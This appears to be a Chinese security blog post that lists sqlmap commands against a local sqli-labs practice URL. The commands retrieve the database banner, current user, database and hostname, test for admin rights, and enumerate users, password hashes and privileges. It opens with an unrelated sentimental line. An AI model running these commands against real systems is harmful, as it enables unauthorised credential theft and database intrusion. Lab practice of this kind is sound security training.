自从你删了我以后,我看了一年五个月的资料,时隔一年五个月,你突然出现在我的访客里,我呆坐了一夜,笑着哭,哭着笑,瞒着所有人我还是很喜欢你。。。 一、sqlmap检索DBMS Banner –banner或者-b sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -b
二、sqlmap检索DBMS当前用户 sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --current-user
三、sqlmap检索DBMS当前数据库 sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --current-db
四、sqlmap检索DBMS当前主机名 sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --hostname
五、sqlmap探测当前用户是否是数据库管理员 sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --is-dba
六、枚举DBMS用户 sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --user
七、枚举DBMS用户密码 sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --password
八、枚举DBMS权限 sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --role
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --privileges
禁止非法,后果自负 欢迎大家关注公众号:web安全工具库